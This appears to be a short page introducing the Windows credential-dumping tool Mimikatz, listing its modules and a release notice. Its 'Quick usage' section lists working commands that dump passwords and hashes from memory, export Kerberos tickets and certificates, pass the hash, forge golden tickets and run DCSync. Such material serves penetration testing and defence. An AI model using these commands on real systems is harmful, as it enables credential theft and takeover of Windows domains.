Mimikatz is a post-exploitation tool written by Benjamin Delpy (gentilkiwi). It’s now well known for extracting plaintexts passwords, hash, PIN code and kerberos tickets from memory. Mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets

It comes in two flavors: x64 or Win32, depending on your windows version (32/64 bits). The Win32 flavor cannot access 64 bits process memory (like lsass) but can open 32 bits minidump under Windows 64 bits. Some operations need administrator privileges or SYSTEM token, so be aware of  UAC from Vista version.

And windbg together, it can even read the virtual machine system password credentials.

Modules

• standard
• privilege
• crypto
• sekurlsa
• kerberos
• lsadump
• vault
• token
• event
• ts
• process
• service
• net
• misc
• library mimilib
• driver mimidrv

Quick usage

privilege::debug
sekurlsa

sekurlsa

sekurlsa::logonpasswords
sekurlsa::tickets /export

sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

kerberos

kerberos::list /export
kerberos::ptt c:\chocolate.kirbi

kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

crypto

crypto::capi
crypto::cng

crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

crypto::keys /export
crypto::keys /machine /export

vault & lsadump

vault::cred
vault::list

token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert

lsadump::dcsync /user:domain\krbtgt /domain:lab.local

mimikatz 2.1.1 20171220 has been released.

The latest version of mimikatz has been released on Github.

Download